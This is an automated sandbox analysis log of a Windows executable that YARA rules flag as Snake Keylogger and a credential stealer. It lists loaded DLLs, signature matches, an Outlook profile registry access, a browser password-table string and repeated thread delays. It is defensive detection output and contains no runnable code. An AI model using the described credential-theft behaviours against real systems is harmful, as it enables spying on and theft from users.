                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0266FA100_2_0266FA10
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0266CA920_2_0266CA92
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_02664B310_2_02664B31
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_026698B80_2_026698B8
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0266BF100_2_0266BF10
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0266EDF00_2_0266EDF0
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0266E3000_2_0266E300
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0266E3100_2_0266E310
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0266305E0_2_0266305E
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_026630F60_2_026630F6
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0266B5520_2_0266B552
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_026635CA0_2_026635CA
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0266BC320_2_0266BC32
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_027682780_2_02768278
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_027679880_2_02767988
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_027636880_2_02763688
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_02760D600_2_02760D60
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276DA180_2_0276DA18
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_027672000_2_02767200
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276DA090_2_0276DA09
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276B2EF0_2_0276B2EF
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276E2C80_2_0276E2C8
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276E2B80_2_0276E2B8
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276EB780_2_0276EB78
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276EB680_2_0276EB68
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276B3000_2_0276B300
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276BBB00_2_0276BBB0
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276BBA00_2_0276BBA0
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_02767BA80_2_02767BA8
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276F8710_2_0276F871
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_027600400_2_02760040
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_027600070_2_02760007
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276C0080_2_0276C008
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_027608F10_2_027608F1
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276C8B80_2_0276C8B8
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276C8A80_2_0276C8A8
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276F8800_2_0276F880
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276D1680_2_0276D168
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276D1580_2_0276D158
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_027609000_2_02760900
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_027671FC0_2_027671FC
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_027681FC0_2_027681FC
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276DE700_2_0276DE70
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_027636780_2_02763678
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276DE610_2_0276DE61
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276B7520_2_0276B752
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276B7580_2_0276B758
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276E7200_2_0276E720
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276E7100_2_0276E710
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276BFF80_2_0276BFF8
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276EFD00_2_0276EFD0
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276EFC10_2_0276EFC1
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276C4600_2_0276C460
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276C4500_2_0276C450
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276F4280_2_0276F428
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276F4180_2_0276F418
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276ACDE0_2_0276ACDE
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_027604A00_2_027604A0
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_027604900_2_02760490
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_02760D500_2_02760D50
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276CD100_2_0276CD10
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276CD010_2_0276CD01
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276D5C00_2_0276D5C0
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0276D5B00_2_0276D5B0
                      Source: Zarefy4bOs.exe, 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Zarefy4bOs.exe
                      Source: Zarefy4bOs.exe, 00000000.00000002.4457793931.00000000005D7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Zarefy4bOs.exe
                      Source: Zarefy4bOs.exe, 00000000.00000002.4458012480.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Zarefy4bOs.exe
                      Source: Zarefy4bOs.exeBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Zarefy4bOs.exe
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeSection loaded: dpapi.dllJump to behavior
                      Source: Zarefy4bOs.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Zarefy4bOs.exe, type: SAMPLEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Zarefy4bOs.exe, type: SAMPLEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: Zarefy4bOs.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: Zarefy4bOs.exe, type: SAMPLEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: Process Memory Space: Zarefy4bOs.exe PID: 3648, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: Zarefy4bOs.exe PID: 3648, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: Zarefy4bOs.exe, --.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Zarefy4bOs.exe, --.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Zarefy4bOs.exe, ----.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Zarefy4bOs.exe, ----.csCryptographic APIs: 'TransformFinalBlock'
                      Source: classification engineClassification label: mal100.troj.spyw.winEXE@1/0@4/4
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeMutant created: NULL
                      Source: Zarefy4bOs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Zarefy4bOs.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Zarefy4bOs.exe, 00000000.00000002.4462765231.000000000390B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002AED000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002B14000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002ACF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: Zarefy4bOs.exeReversingLabs: Detection: 65%
                      Source: Zarefy4bOs.exeVirustotal: Detection: 67%
                      Source: Zarefy4bOs.exeString found in binary or memory: F-Stopw
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Zarefy4bOs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Zarefy4bOs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeMemory allocated: DD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeMemory allocated: 2880000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeMemory allocated: DD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 599890Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 599781Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 599672Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 599562Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 599453Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 599343Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 599234Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 599125Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 599015Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 598906Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 598797Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 598687Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 598578Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 598468Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 598359Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 598250Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 598140Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 598031Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 597922Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 597812Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 597703Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 597593Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 597484Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 597375Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 597265Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 597156Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 597047Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 596937Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 596828Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 596718Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 596609Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 596499Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 596390Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 596281Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 596172Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 596062Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 595953Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 595843Jump to behavior
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeThread delayed: delay time: 595734Jump to behavior
